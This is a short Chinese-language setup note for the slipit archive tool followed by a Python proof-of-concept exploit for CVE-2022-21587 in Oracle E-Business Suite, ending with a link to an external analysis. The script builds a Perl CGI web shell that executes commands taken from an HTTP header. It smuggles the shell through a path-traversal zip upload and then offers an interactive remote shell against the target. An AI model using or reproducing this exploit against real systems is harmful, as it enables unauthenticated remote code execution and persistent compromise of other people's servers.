安装 slipit：1.git clone https://github.com/usdAG/slipit2.cd slipit3.python3 setup.py sdist4.pip3 install --user dist/*5.export PATH=/home/yourname/.local/bin:$PATH

#!/usr/bin/python3#POC by HMs#CVE-2022-21587
import requestsimport osimport sys

shell = ''' use CGI;print CGI::header( -type => 'text/plain' );my $cmd = CGI::http('HTTP_CMD');print system($cmd);exit 0;'''
def Write_Shell():  with open("txkFNDWRR.pl", "w") as f:    f.writelines("%s \n" %(shell))  os.system("slipit --overwrite --separator '/' --depth 5 --prefix '/FMW_Home/Oracle_EBS-app1/common/scripts/' txkFNDWRR.zip txkFNDWRR.pl")  os.system("uuencode txkFNDWRR.zip txkFNDWRR.zip > t.uue")
def exploit():  Write_Shell()  host = sys.argv[1]  if host.endswith == '/':    url = host + 'OA_HTML/BneUploaderService?bne:uueupload=true'    url_shell = host + '/OA_CGI/FNDWRR.exe'  else:    url = host + '/OA_HTML/BneUploaderService?bne:uueupload=true'    url_shell = host + '/OA_CGI/FNDWRR.exe'  file = 't.uue'  up = {    'text':(file,open(file, 'rb'),       "multipart/mixed"      )    }  request = requests.post(url,files=up)  if request.status_code == 200:    print('\n-----------------------------------\n[+] Exploiting .......\nShell has uploaded!\n-----------------------------------\n')    print('`press q || Q || quit to exit !!!` \n\n')    print('`exploit: python3 http|https://example.com` \n\n')    while True:      cmd = input("~shell[~]: ")      if cmd == 'q' or cmd == 'quit' or cmd == 'Q':        break      else:        os.system("curl -ks '%s' -H 'cmd: %s'" % (url_shell,cmd))  else:    print('not vuln!')      
if __name__ == '__main__':  exploit()

https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis?referrer=notificationEmail